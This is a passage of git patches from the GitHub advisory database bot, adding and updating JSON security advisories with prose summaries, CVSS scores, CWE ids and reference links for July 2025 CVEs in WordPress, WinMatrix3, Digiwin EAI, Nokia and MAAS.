"CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7914" + }, + { + "type": "WEB", + "url": "https://github.com/gaochen61/IoTVuln/blob/main/Tenda_AC6_V15.03.06.50/setparentcontrolinfo.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317029" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317029" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618859" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T01:15:22Z" + } +} \ No newline at end of file From c09c5dc34da90b0618fd55da942b3293c39a4d8b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 06:32:58 +0000 Subject: [PATCH 043/323] Publish Advisories GHSA-585c-5qcq-7fgc GHSA-frp4-hvgq-ch3w GHSA-gjcv-wf94-q4h6 GHSA-jxj8-fmv2-mqm5 --- .../GHSA-585c-5qcq-7fgc.json | 36 +++++++++++++++ .../GHSA-frp4-hvgq-ch3w.json | 44 +++++++++++++++++++ .../GHSA-gjcv-wf94-q4h6.json | 40 +++++++++++++++++ .../GHSA-jxj8-fmv2-mqm5.json | 40 +++++++++++++++++ 4 files changed, 160 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-585c-5qcq-7fgc/GHSA-585c-5qcq-7fgc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-frp4-hvgq-ch3w/GHSA-frp4-hvgq-ch3w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json diff --git a/advisories/unreviewed/2025/07/GHSA-585c-5qcq-7fgc/GHSA-585c-5qcq-7fgc.json b/advisories/unreviewed/2025/07/GHSA-585c-5qcq-7fgc/GHSA-585c-5qcq-7fgc.json new file mode 100644 index 0000000000000..f6bb731144d42 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-585c-5qcq-7fgc/GHSA-585c-5qcq-7fgc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-585c-5qcq-7fgc", + "modified": "2025-07-21T06:31:19Z", + "published": "2025-07-21T06:31:19Z", + "aliases": [ + "CVE-2025-54352" + ], + "details": "WordPress 3.5 through 6.8.2 allows remote attackers to guess titles of private and draft posts via pingback.ping XML-RPC requests. NOTE: the Supplier is not changing this behavior.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54352" + }, + { + "type": "WEB", + "url": "https://www.imperva.com/blog/beware-a-threat-actor-could-steal-the-titles-of-your-private-and-draft-wordpress-posts" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-669" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T05:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-frp4-hvgq-ch3w/GHSA-frp4-hvgq-ch3w.json b/advisories/unreviewed/2025/07/GHSA-frp4-hvgq-ch3w/GHSA-frp4-hvgq-ch3w.json new file mode 100644 index 0000000000000..7f4e8b60b5a97 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-frp4-hvgq-ch3w/GHSA-frp4-hvgq-ch3w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frp4-hvgq-ch3w", + "modified": "2025-07-21T06:31:19Z", + "published": "2025-07-21T06:31:19Z", + "aliases": [ + "CVE-2025-7916" + ], + "details": "WinMatrix3 developed by Simopro Technology has an Insecure Deserialization vulnerability, allowing unauthenticated remote attackers to execute arbitrary code on the server by sending maliciously crafted serialized contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7916" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10257-e88f3-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10256-14d55-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T06:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json b/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json new file mode 100644 index 0000000000000..2790976476f7a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gjcv-wf94-q4h6", + "modified": "2025-07-21T06:31:19Z", + "published": "2025-07-21T06:31:19Z", + "aliases": [ + "CVE-2025-7918" + ], + "details": "WinMatrix3 Web package developed by Simopro Technology has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7918" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10264-6c4b7-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10259-b4b38-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T06:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json b/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json new file mode 100644 index 0000000000000..29aaa4d9cee0c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxj8-fmv2-mqm5", + "modified": "2025-07-21T06:31:19Z", + "published": "2025-07-21T06:31:19Z", + "aliases": [ + "CVE-2025-7917" + ], + "details": "WinMatrix3 Web package developed by Simopro Technology has an Arbitrary File Upload vulnerability, allowing remote attackers with administrator privileges to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7917" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10263-5f2e7-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10258-16bbf-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T06:15:28Z" + } +} \ No newline at end of file From b4e8d31cc3ce4464675e1e121ad6933c1fa9a290 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 09:35:06 +0000 Subject: [PATCH 044/323] Publish Advisories GHSA-hf3p-gpvx-q597 GHSA-23v7-v5p9-cqr9 GHSA-25x7-27vj-3vw7 GHSA-4wgq-49w7-jjrr GHSA-4xw2-w53m-rwj2 GHSA-525h-hfxr-w785 GHSA-7gfh-4gmq-q4qm GHSA-822c-pcp6-4r68 GHSA-9qrf-5w3r-r7p7 GHSA-gjcv-wf94-q4h6 GHSA-h7h2-hvvx-9pw7 GHSA-j8hp-g4wv-c9xj GHSA-jxj8-fmv2-mqm5 GHSA-mgfp-cfcp-654m GHSA-q2pr-mc98-24cv GHSA-r7rh-8pmr-qq23 GHSA-rj69-p564-922p GHSA-v869-2g6q-4fwq GHSA-w362-42cv-6j7v GHSA-x75p-289f-65mx --- .../GHSA-hf3p-gpvx-q597.json | 26 +++++++- .../GHSA-23v7-v5p9-cqr9.json | 48 +++++++++++++++ .../GHSA-25x7-27vj-3vw7.json | 44 ++++++++++++++ .../GHSA-4wgq-49w7-jjrr.json | 60 +++++++++++++++++++ .../GHSA-4xw2-w53m-rwj2.json | 29 +++++++++ .../GHSA-525h-hfxr-w785.json | 36 +++++++++++ .../GHSA-7gfh-4gmq-q4qm.json | 40 +++++++++++++ .../GHSA-822c-pcp6-4r68.json | 36 +++++++++++ .../GHSA-9qrf-5w3r-r7p7.json | 44 ++++++++++++++ .../GHSA-gjcv-wf94-q4h6.json | 6 +- .../GHSA-h7h2-hvvx-9pw7.json | 48 +++++++++++++++ .../GHSA-j8hp-g4wv-c9xj.json | 29 +++++++++ .../GHSA-jxj8-fmv2-mqm5.json | 6 +- .../GHSA-mgfp-cfcp-654m.json | 36 +++++++++++ .../GHSA-q2pr-mc98-24cv.json | 40 +++++++++++++ .../GHSA-r7rh-8pmr-qq23.json | 44 ++++++++++++++ .../GHSA-rj69-p564-922p.json | 29 +++++++++ .../GHSA-v869-2g6q-4fwq.json | 40 +++++++++++++ .../GHSA-w362-42cv-6j7v.json | 36 +++++++++++ .../GHSA-x75p-289f-65mx.json | 36 +++++++++++ 20 files changed, 710 insertions(+), 3 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-23v7-v5p9-cqr9/GHSA-23v7-v5p9-cqr9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-25x7-27vj-3vw7/GHSA-25x7-27vj-3vw7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4wgq-49w7-jjrr/GHSA-4wgq-49w7-jjrr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-525h-hfxr-w785/GHSA-525h-hfxr-w785.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7gfh-4gmq-q4qm/GHSA-7gfh-4gmq-q4qm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-822c-pcp6-4r68/GHSA-822c-pcp6-4r68.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9qrf-5w3r-r7p7/GHSA-9qrf-5w3r-r7p7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h7h2-hvvx-9pw7/GHSA-h7h2-hvvx-9pw7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mgfp-cfcp-654m/GHSA-mgfp-cfcp-654m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q2pr-mc98-24cv/GHSA-q2pr-mc98-24cv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r7rh-8pmr-qq23/GHSA-r7rh-8pmr-qq23.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v869-2g6q-4fwq/GHSA-v869-2g6q-4fwq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json diff --git a/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json b/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json index a8f7021b5c3f7..1610c6442473b 100644 --- a/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json +++ b/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hf3p-gpvx-q597", - "modified": "2025-07-21T03:30:20Z", + "modified": "2025-07-21T09:33:26Z", "published": "2025-05-22T15:34:51Z", "aliases": [ "CVE-2025-5024" @@ -31,10 +31,34 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:10742" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11403" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:11404" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11405" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11406" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11407" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11408" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11418" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-5024" diff --git a/advisories/unreviewed/2025/07/GHSA-23v7-v5p9-cqr9/GHSA-23v7-v5p9-cqr9.json b/advisories/unreviewed/2025/07/GHSA-23v7-v5p9-cqr9/GHSA-23v7-v5p9-cqr9.json new file mode 100644 index 0000000000000..6124ffa635453 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-23v7-v5p9-cqr9/GHSA-23v7-v5p9-cqr9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23v7-v5p9-cqr9", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-7344" + ], + "details": "The EAI developed by Digiwin has a Privilege Escalation vulnerability, allowing remote attackers with regular privileges to elevate their privileges to administrator level via a specific API.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7344" + }, + { + "type": "WEB", + "url": "https://www.digiwin.com/tw/news/3567.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10273-ce2ed-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10272-5b691-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-648" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-25x7-27vj-3vw7/GHSA-25x7-27vj-3vw7.json b/advisories/unreviewed/2025/07/GHSA-25x7-27vj-3vw7/GHSA-25x7-27vj-3vw7.json new file mode 100644 index 0000000000000..036201c335a35 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-25x7-27vj-3vw7/GHSA-25x7-27vj-3vw7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25x7-27vj-3vw7", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-7919" + ], + "details": "WinMatrix3 Web package developed by Simopro Technology has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7919" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10264-6c4b7-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10259-b4b38-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4wgq-49w7-jjrr/GHSA-4wgq-49w7-jjrr.json b/advisories/unreviewed/2025/07/GHSA-4wgq-49w7-jjrr/GHSA-4wgq-49w7-jjrr.json new file mode 100644 index 0000000000000..4a8920d3e1e47 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4wgq-49w7-jjrr/GHSA-4wgq-49w7-jjrr.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wgq-49w7-jjrr", + "modified": "2025-07-21T09:33:27Z", + "published": "2025-07-21T09:33:27Z", + "aliases": [ + "CVE-2025-7354" + ], + "details": "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7354" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/includes/shortcodes/button.php#L408" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/includes/shortcodes/expand.php#L130" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/includes/shortcodes/members.php#L79" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/includes/shortcodes/post.php#L116" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/includes/shortcodes/user.php#L95" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3328729" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/62d32cda-bb6d-4ffa-82b9-f2f6e8d4346f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json b/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json new file mode 100644 index 0000000000000..0287aedce4f19 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xw2-w53m-rwj2", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-24936" + ], + "details": "The web application allows user input to pass unfiltered to a command executed on the underlying operating system. The vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet.\n\nAn attacker with low privileged access to the application has the potential to execute commands on the operating system under the context of the webserver.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24936" + }, + { + "type": "WEB", + "url": "https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2025-24936" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-525h-hfxr-w785/GHSA-525h-hfxr-w785.json b/advisories/unreviewed/2025/07/GHSA-525h-hfxr-w785/GHSA-525h-hfxr-w785.json new file mode 100644 index 0000000000000..3dcd205e84ea7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-525h-hfxr-w785/GHSA-525h-hfxr-w785.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-525h-hfxr-w785", + "modified": "2025-07-21T09:33:27Z", + "published": "2025-07-21T09:33:27Z", + "aliases": [ + "CVE-2024-6107" + ], + "details": "Due to insufficient verification, an attacker could use a malicious client to bypass authentication checks and run RPC commands in a region. This has been addressed in MAAS and updated in the corresponding snaps.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6107" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/maas/+bug/2069094" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T09:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7gfh-4gmq-q4qm/GHSA-7gfh-4gmq-q4qm.json b/advisories/unreviewed/2025/07/GHSA-7gfh-4gmq-q4qm/GHSA-7gfh-4gmq-q4qm.json new file mode 100644 index 0000000000000..ddce7bf9ea55b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7gfh-4gmq-q4qm/GHSA-7gfh-4gmq-q4qm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gfh-4gmq-q4qm", + "modified": "2025-07-21T09:33:27Z", + "published": "2025-07-21T09:33:27Z", + "aliases": [ + "CVE-2025-4685" + ], + "details": "The Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML data attributes of multiple widgets, in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4685" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3320485" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9ec6af-fa51-4e14-abf6-450c1ca6f8d5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-822c-pcp6-4r68/GHSA-822c-pcp6-4r68.json b/advisories/unreviewed/2025/07/GHSA-822c-pcp6-4r68/GHSA-822c-pcp6-4r68.json new file mode 100644 index 0000000000000..f04df64be7a7f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-822c-pcp6-4r68/GHSA-822c-pcp6-4r68.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-822c-pcp6-4r68", + "modified": "2025-07-21T09:33:27Z", + "published": "2025-07-21T09:33:27Z", + "aliases": [ + "CVE-2025-1469" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Turtek Software Eyotek allows Exploitation of Trusted Identifiers.This issue affects Eyotek: before 11.03.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1469" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0163" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9qrf-5w3r-r7p7/GHSA-9qrf-5w3r-r7p7.json b/advisories/unreviewed/2025/07/GHSA-9qrf-5w3r-r7p7/GHSA-9qrf-5w3r-r7p7.json new file mode 100644 index 0000000000000..0367d860c8f5e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9qrf-5w3r-r7p7/GHSA-9qrf-5w3r-r7p7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qrf-5w3r-r7p7", + "modified": "2025-07-21T09:33:27Z", + "published": "2025-07-21T09:33:27Z", + "aliases": [ + "CVE-2025-7369" + ], + "details": "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.4.2. This is due to missing or incorrect nonce validation on the preview function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.\nIn combination with CVE-2025-7354, it leads to Reflected Cross-Site Scripting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7369" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.4.2/inc/core/generator.php#L339" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3328729" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5934d1c8-1553-4908-aaab-89d2189eb4cd?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json b/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json index 2790976476f7a..977f5e08f7e5e 100644 --- a/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json +++ b/advisories/unreviewed/2025/07/GHSA-gjcv-wf94-q4h6/GHSA-gjcv-wf94-q4h6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gjcv-wf94-q4h6", - "modified": "2025-07-21T06:31:19Z", + "modified": 